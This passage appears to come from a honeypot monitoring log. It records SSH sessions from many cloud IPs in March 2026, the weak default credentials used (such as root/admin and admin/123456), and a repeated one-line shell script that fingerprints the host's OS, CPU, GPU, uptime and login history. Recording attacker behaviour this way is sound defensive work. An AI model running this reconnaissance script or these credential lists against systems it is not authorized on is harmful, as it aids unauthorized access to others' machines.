2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 outback_root_5 (170.64.210.131) — Sydney, Australia · 2 sessions · 8 cmds

2026-03-03 04:09 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 eagle_root_21 (107.170.10.192) — Secaucus, United States · 2 sessions · 8 cmds

2026-03-03 03:15 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 star_root_21 (162.243.63.82) — Secaucus, United States · 2 sessions · 8 cmds

2026-03-03 00:59 EST · as postgres/postgres, root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 rogue_root_53 (178.128.85.68) — Singapore, Singapore · 2 sessions · 8 cmds

2026-03-03 00:36 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 fog_root_2 (209.97.139.26) — Slough, United Kingdom · 18 sessions · 72 cmds

2026-03-02 23:04 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 18x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×18

$ uname -s -v -n -m 2 > /dev/null ×18

$ uname -m 2 > /dev/null ×18

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×18

🎭 dutch_root_11 (188.166.92.89) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-02 22:21 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 reef_root_7 (170.64.215.150) — Sydney, Australia · 8 sessions · 32 cmds

2026-03-02 22:00 EST · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 stein_root_21 (165.22.88.202) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-02 20:06 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 wraith_root_50 (178.128.211.201) — Singapore, Singapore · 4 sessions · 16 cmds

2026-03-02 19:13 EST · as root/admin, root/admin123, root/qwerty

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tiger_root_10 (142.93.215.57) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-02 18:44 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 stroopwafel_root_10 (167.99.211.49) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-02 18:19 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 jade_sol (61.138.113.187) — Hohhot, China · 4 sessions · 4 cmds

2026-03-02 07:38 EST · as admin/123456, admin/admin, admin/admin123

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ uname -a ×4

↳ OS/kernel identification

🎭 yankee_root_19 (146.190.158.248) — Santa Clara, United States · 2 sessions · 8 cmds

2026-03-02 17:41 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 tea_root_14 (159.65.90.125) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-02 17:36 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 kiwi_root_5 (209.38.27.24) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-02 16:40 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 autobahn_root_5 (138.197.181.113) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-02 16:36 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 chai_root_7 (142.93.208.229) — Bengaluru, India · 9 sessions · 36 cmds

2026-03-02 15:23 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 eagle_root_22 (137.184.8.195) — Santa Clara, United States · 7 sessions · 28 cmds

2026-03-02 15:28 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 yankee_root_20 (107.170.51.137) — Secaucus, United States · 2 sessions · 8 cmds

2026-03-02 15:29 EST · as root/12345678, root/admin

export → uname → cat

